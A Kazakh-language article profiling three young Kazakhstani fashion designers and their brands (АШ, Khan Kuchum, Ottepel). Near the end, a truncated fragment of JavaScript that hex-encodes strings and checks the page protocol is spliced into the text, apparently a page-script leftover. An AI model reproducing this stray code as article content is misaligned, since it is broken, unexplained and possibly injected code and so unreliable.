Қазақстанда жасалған 3 ең қызық сән бұйымдарының топтамалары

Бір қарағанда Қазақстанда сән индустриясы өте нашар немесе мүлдем дамымаған болып көрінеді. Алайда, менің байқауымша, соңғы кездері жасөспірімдер арасында өте сәнді, оригиналды, әдемі  бұйымдар шығарыла басталды. Оған қоса, олардың сапасы және құндылығы шетелдік сән бұйымдармен бәсекелес бола тұра,  бағасы да олардан кем болмайды. Осыны дәлелдеу  мақсатымен мен қазақ даласында өскен үш жас дизайнермен таныстырып кетейін.

Аяулым (Айя) Шалқар - 19 жастағы қазақ жастарына жақсы танымал модель. Ол инстаграм желісі арқылы елге танымал адам болды. Қазіргі таңда Айяның оқырмандар саны 265 мыңнан асты. Айя Аустрияның Вена қаласындағы Антесваге университетінде білім алуда, сонымен қатар модель болып жұмыс істейді. 

 Осы жазда Аяулым өзінің "АШ" атты брендін қалыптастырып, бірінші мини топтамасымен қуандырды.  "АШ" - Аяулымның аты-жөнінің аббревитурасына келеді.  Брендінің басты идеясы – ашылу. Аяулым өз киімдері арқылы адамдардарды жүректерін, көздерін, саналарын ашуға шақырады.  Бірінші минималистік стильде жасалған топтамасы әртүрлі жазулары бар қара және ақ түсті қысқа топтардан тұрады.

"Ashwear" деп аталатын парақшаны қазіргі күнде 10 мың адам оқиды. Айяның жұмысын ұнатсаңыз, "АШ" брендінің киімдерін Алматы қаласының Достық Плаза сауда үйінде сатып ала аласыз. 

Данила «Окай» Кучумов - 17 жастағы жас дизайнер. Khan Kuchum деген брендін бастап, осы жылы Алматыда өткен Mercedes-Benz  сән аптасында бәрін өзінің ерекше стилімен таң қалдырды. Даниланың жазғы топтамасында ұзын поло жейделер және әйелдер мен ер адамдардың спорттық киімдері ұсынылды.

Даниланың стилі, жаңалықтардан қорықпайтын жас адамға сай, креативті стиль.Данила өзі кигісі келетін киімдерді жасайды. Сондықтан киім үлгілерінде көптеген қызық бөлшектер және  түстер үйлесімді көрінеді.

Ottepel – Қазақстандағы бірінші урбан стилінде жасалған киім компаниясы.  Екі жас модельер Роксана Адильбекова және Медет Шаяхметов Ottepel компаниясын ашып,Қазақстанның жастарына арналған киімдер жасауды бастады. Олардың киімдерінің бас ерекшелігі - қаланың көшелерінде киюге жақсы келетіндігі. Екі модельер кішкентай жасынан бастап өз киім топтамаларын шығаруды армандаған.

Медет Ottepel-де Алматы мен Нью-Йорк қалаларының стильдерін қосып, ерекше урбан киімдердің модельдерін құрастыруды қалаған. Ал Роксана, осы екі қала арасында өмір сүргендіктен, олардың стильдерін қосып, жаңа дизайн жасағысы келген. Екеуі бірге жұмыс істеп, Алматының жастарына арналған ерекше топтамалар ұсынады. 

Қазақ елі осындай дарынды адамдармен бай болғандығын көрдік. Шопингке шыққанда, қазақстандық дизайнерлерді айналып өтпеңіз.

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Бөлісу: